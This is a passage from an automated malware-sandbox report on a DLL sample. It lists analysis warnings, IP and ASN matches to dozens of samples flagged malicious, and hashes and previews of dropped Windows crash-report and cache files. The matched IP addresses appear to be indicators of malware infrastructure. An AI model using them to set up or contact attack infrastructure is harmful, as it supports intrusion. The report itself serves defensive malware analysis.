                        • Number of non-executed functions: 295
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.210, 173.222.108.226, 40.91.112.76, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        19:50:46API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        207.148.81.119PtBIxmYbK8.dllGet hashmaliciousBrowse
                          MUm03X31dO.dllGet hashmaliciousBrowse
                            ALNgwfVtrB.dllGet hashmaliciousBrowse
                              4NBdOVqTyL.dllGet hashmaliciousBrowse
                                nIQCsrVbbw.dllGet hashmaliciousBrowse
                                  hPJnda9rBy.dllGet hashmaliciousBrowse
                                    nV5Wu77N8J.dllGet hashmaliciousBrowse
                                      nIQCsrVbbw.dllGet hashmaliciousBrowse
                                        hPJnda9rBy.dllGet hashmaliciousBrowse
                                          nV5Wu77N8J.dllGet hashmaliciousBrowse
                                            OZra.dllGet hashmaliciousBrowse
                                              RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                EcJ8rbg.dllGet hashmaliciousBrowse
                                                  gyZm68Cgwf.dllGet hashmaliciousBrowse
                                                    5o8zdV3GU3.dllGet hashmaliciousBrowse
                                                      aoPHg7b78c.dllGet hashmaliciousBrowse
                                                        xxWrY2YG7s.dllGet hashmaliciousBrowse
                                                          7MhGa3iotM.dllGet hashmaliciousBrowse
                                                            vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                              M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                104.131.62.48PtBIxmYbK8.dllGet hashmaliciousBrowse
                                                                  MUm03X31dO.dllGet hashmaliciousBrowse
                                                                    ALNgwfVtrB.dllGet hashmaliciousBrowse
                                                                      4NBdOVqTyL.dllGet hashmaliciousBrowse
                                                                        nIQCsrVbbw.dllGet hashmaliciousBrowse
                                                                          hPJnda9rBy.dllGet hashmaliciousBrowse
                                                                            nV5Wu77N8J.dllGet hashmaliciousBrowse
                                                                              nIQCsrVbbw.dllGet hashmaliciousBrowse
                                                                                hPJnda9rBy.dllGet hashmaliciousBrowse
                                                                                  nV5Wu77N8J.dllGet hashmaliciousBrowse
                                                                                    OZra.dllGet hashmaliciousBrowse
                                                                                      RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                                                        EcJ8rbg.dllGet hashmaliciousBrowse
                                                                                          gyZm68Cgwf.dllGet hashmaliciousBrowse
                                                                                            5o8zdV3GU3.dllGet hashmaliciousBrowse
                                                                                              aoPHg7b78c.dllGet hashmaliciousBrowse
                                                                                                xxWrY2YG7s.dllGet hashmaliciousBrowse
                                                                                                  7MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                                    vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                      M2hsMd9hTq.dllGet hashmaliciousBrowse

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        AS-CHOOPAUSPtBIxmYbK8.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        MUm03X31dO.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        ALNgwfVtrB.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        4NBdOVqTyL.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        nIQCsrVbbw.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        hPJnda9rBy.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        nV5Wu77N8J.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        xD2TnigEaY.exeGet hashmaliciousBrowse
                                                                                                        • 208.167.249.72
                                                                                                        nIQCsrVbbw.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        hPJnda9rBy.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        nV5Wu77N8J.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        1nJGU59JPU.exeGet hashmaliciousBrowse
                                                                                                        • 136.244.117.138
                                                                                                        kGl1qp3Ox8.exeGet hashmaliciousBrowse
                                                                                                        • 149.28.78.238
                                                                                                        OZra.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        EcJ8rbg.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        Comrpobante_60.vbsGet hashmaliciousBrowse
                                                                                                        • 149.248.50.230
                                                                                                        sample.jsGet hashmaliciousBrowse
                                                                                                        • 45.76.154.237
                                                                                                        gyZm68Cgwf.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        5o8zdV3GU3.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        DIGITALOCEAN-ASNUSPtBIxmYbK8.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        MUm03X31dO.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        ALNgwfVtrB.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        4NBdOVqTyL.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        nIQCsrVbbw.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        GNXG5XLBEH.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        hPJnda9rBy.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        nV5Wu77N8J.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        nIQCsrVbbw.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        hPJnda9rBy.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        nV5Wu77N8J.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        vk8A1dXh5C.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        GahImDA8DA.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        prkVkqYIwv.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        OZra.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        EcJ8rbg.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        P42zLwaJQk.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        9ro85QVN0F.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        hWLlYv2MAXGet hashmaliciousBrowse
                                                                                                        • 159.89.53.206

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_12a180e49793e381a8b848106c2e1caa7a6a4277_7cac0383_18a51c8a\Report.wer
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.7981757905947282
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:kc4SgFonYyBy9haol7Jf0pXIQcQSc6mcEUcw3/s+a+z+HbHgpVG4rmMoVazWbSmj:eunLHsieryjpq/u7saS274ItW
                                                                                                        MD5:F6F986B555349D70EC66E15ABCC41890
                                                                                                        SHA1:5C2EF2932A1F16307AC18951CBACD3F50151C05F
                                                                                                        SHA-256:4D9F534FD2F77A71E36EA3A820599F7C5B4489D1D32039948B965D53AD59414E
                                                                                                        SHA-512:2A217B88926A7AB47A31A6F472CBF54173675B9502AF968B4BA16FFB2A0C0463CB2F7BB6023111D76890DBD98470A914D42751D7A0F3ECB4204486BCEFD65831
                                                                                                        Malicious:false
                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.5.9.7.9.5.1.6.4.8.8.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.d.3.1.0.f.2.-.f.9.e.1.-.4.a.d.7.-.a.1.b.3.-.1.2.6.2.3.e.d.3.f.e.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.e.c.b.1.7.f.-.0.a.4.4.-.4.7.8.e.-.b.e.a.d.-.e.f.e.0.6.4.4.7.9.0.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.4.-.0.0.0.1.-.0.0.1.b.-.2.2.e.d.-.a.d.7.e.7.7.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER355.tmp.dmp
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, Fri Jan 14 18:49:56 2022, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):44300
                                                                                                        Entropy (8bit):2.1290506370949975
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:NedqBIhNxjO5mYROQaPYfEgZGvI0yrfZPZ/PZw/WcmW0v7kcF4Nw7WZNVNF:4ta5rBDYvRgxDw/zmWY7kcF5WXV7
                                                                                                        MD5:7D5D469A218004033CF0ED3664400CB8
                                                                                                        SHA1:C4EE2D5FE696E1BD6F71C0E0DD8DA2F3490A1A5E
                                                                                                        SHA-256:6EFF54679F3143D50E0ABD570796F215A314A2C9944755DF38223084BEEFEC85
                                                                                                        SHA-512:9E70894E19311018AAD958273E4D0EE97C063967501794D2F81F8243E1591C17310F2836761C28BCA875B2CAFB035E9C50D945CF0410355529C502B196EEA970
                                                                                                        Malicious:false
                                                                                                        Preview: MDMP....... ..........a....................................$...T............%..........`.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T.......t......a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER961.tmp.WERInternalMetadata.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8348
                                                                                                        Entropy (8bit):3.701420415223348
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Rrl7r3GLNiYR6OAx6YrJSUXy1gmfdSwGs+pBs89bakKhsf3N+m:RrlsNi26OAx6YlSUXy1gmfdSwCakKaf9
                                                                                                        MD5:0E3B556676E1972AF45F6860569A4348
                                                                                                        SHA1:CCA48B9EBB72F6FD774F8A5B325A3F3E01F2CACC
                                                                                                        SHA-256:75B3330CE4091AB2C41009973760A92D19547054C547DA848BB949965346C191
                                                                                                        SHA-512:AA446E322338003BA84B921EBBB6EB3F7B7E8618994D96CFB0E0EEF8A8C98B3A33B4D6E0CEFA8362F80E04857643EEBB071D126D5CBF04F1CD544F0EA7CD6B0F
                                                                                                        Malicious:false
                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.6.0.<./.P.i.d.>.......
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE44.tmp.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4598
                                                                                                        Entropy (8bit):4.473108429492209
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:cvIwSD8zs3JgtWI924WSC8BVp8fm8M4J2+SZFL+q84pzLTKcQIcQw0Vd:uITfZhxSN/OJQfxXKkw0Vd
                                                                                                        MD5:032926C5777B8A0C1B4AE5FD2E6341A0
                                                                                                        SHA1:40E9C560877A7DFD13F7B873DB21A94969A4A750
                                                                                                        SHA-256:8A52CE09864457C05D2CFFC21719F2D4FBD93C39AC133CE67772F37C1192E695
                                                                                                        SHA-512:789F99617C9DA1188FFABCB71B4DAC6B055BBBE16F83B0962FF121CAD9A81EFA03196AD58FAD7C61FFE7A82FC65E6AF7AA0B5D1283E03CF5BEC27BE3E7BF3A98
                                                                                                        Malicious:false
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342320" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF761.tmp.csv
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):54270
                                                                                                        Entropy (8bit):3.039245433474246
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:bNHszwoPun9zObOA3An2NH8eII/TlS6KzOojlp2mpoc:bNHszwoPun9zObOA3An2NH8eII/To6KV
                                                                                                        MD5:E774D2B8707457EEF38FFCD785616182
                                                                                                        SHA1:D5368EC392C150B5C1D2C5601A775ACD0A3F0E1D
                                                                                                        SHA-256:77A23CBC153EFAC355ADC08F9839A27BE6B22F69C013158BD4140162E57F60DD
                                                                                                        SHA-512:DAA572285A4531933A3C0605EE7B40B05E793008F187AB2F7D4588BB970B39EB1561C5A95C5AAB74A77AB9A63A7DD1F29C3CA41D8B4E579E1EF1BB630D8993C9
                                                                                                        Malicious:false
                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF61.tmp.txt
                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13340
                                                                                                        Entropy (8bit):2.694806766675773
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:9GiZYWlEgJhIqYBYwOW5VHZYEZZmtk0iOlBIHwQAKnaF1BCBwHIA+P3:9jZDl8qWXZHdZnaF1BCBlpP3
                                                                                                        MD5:548F7476594C65B2D9A44ADBE265DD3B
                                                                                                        SHA1:4D81020E8B908AA93E7BBF9B4727F6F4EE2EA264
                                                                                                        SHA-256:C6AF5658B1289EA4A6A4A33E9CD9BFB885277974F2741F5D2EDC54DF3F3F340B
                                                                                                        SHA-512:3015496AA8DB2EEF81C8B3E35CE453A080293518DE509B6B9D2BC4BA83C58FE0E33A114D12F94387F70DF3C92D62C27F650090FE2B4923706581A26245B5A4D5
                                                                                                        Malicious:false
                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61414
                                                                                                        Entropy (8bit):7.995245868798237
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                                                                                        MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                                                                                        SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                                                                                        SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                                                                                        SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                                                                                        Malicious:false
                                                                                                        Preview: MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....
                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.1084656046114056
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kKkahk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:h9kPlE99SNxAhUeYlUSA/t
                                                                                                        MD5:F265C930EF44E6ACBA853DC0EF3CCA52
                                                                                                        SHA1:98DBD62394E3FAD572DEAABAD08BF56A2F355F03
                                                                                                        SHA-256:A51CCED759A41167FA135BF13E26467986C030908DB1B708157F0BD073DA6EDD
                                                                                                        SHA-512:78A8EB17A923CC0C607BB055AD87B3979E992A165A324E1ABD09BAB284A57B30686C21879DC90C9389EA7F771D8B5AA5767FF5B890DEB6C5B7A631530934D736
                                                                                                        Malicious:false
                                                                                                        Preview: p...... .........(..w...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...
                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1572864
                                                                                                        Entropy (8bit):4.23652836958112
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:Al/ULFzTnZ67Hr5Kem9F7r66iL9Cvdq6KsqEFm4OrTkkiyrI:y/ULFzTnZ6br5K33i
                                                                                                        MD5:0F7E9389B8352594A1D1DA63202D5E76
                                                                                                        SHA1:B8D01D1CAB800DBB068758A3FDA30883C526A6B3
                                                                                                        SHA-256:C688CB041A1A6F2729B4E4EDBACD0CDC07632B2136EF3D45501BEB791B1D9620
                                                                                                        SHA-512:4B3AAE60BEA27A4586D32A6C4F63D490BA206EFA136C5792A598756B929EDC42F7B384A068CB3FB653DEE7EB83CF454F20FA5C6AE4BB8719BDD14051E389296B
                                                                                                        Malicious:false
                                                                                                        Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.]..w...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16384
                                                                                                        Entropy (8bit):3.7219597294472537
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:z8f5K5lcv4KgnVVeeDzei1NKZtjaT8GRFwWno:QhK+g/eeDzesNYtjnGRFwW
                                                                                                        MD5:E0EE0560CE5C8770F5E1AE82080874B1
                                                                                                        SHA1:DBB38E3F880FC4E4EC56BBDA55EB1E633C274E75
                                                                                                        SHA-256:35AE4F85D7E0B29E096DB29EAF98B81BE8536CF0734CEDDD3847B7CC5D65DD7A
                                                                                                        SHA-512:7A6C835174199EA9864D4FF672FD07F707B87CF29D280FD1F0CD4B9DA043021D488B1868BDAD3EBB6E847D10B3435F077D445EFE1220BF8F9C26E98CB8503AEB
                                                                                                        Malicious:false
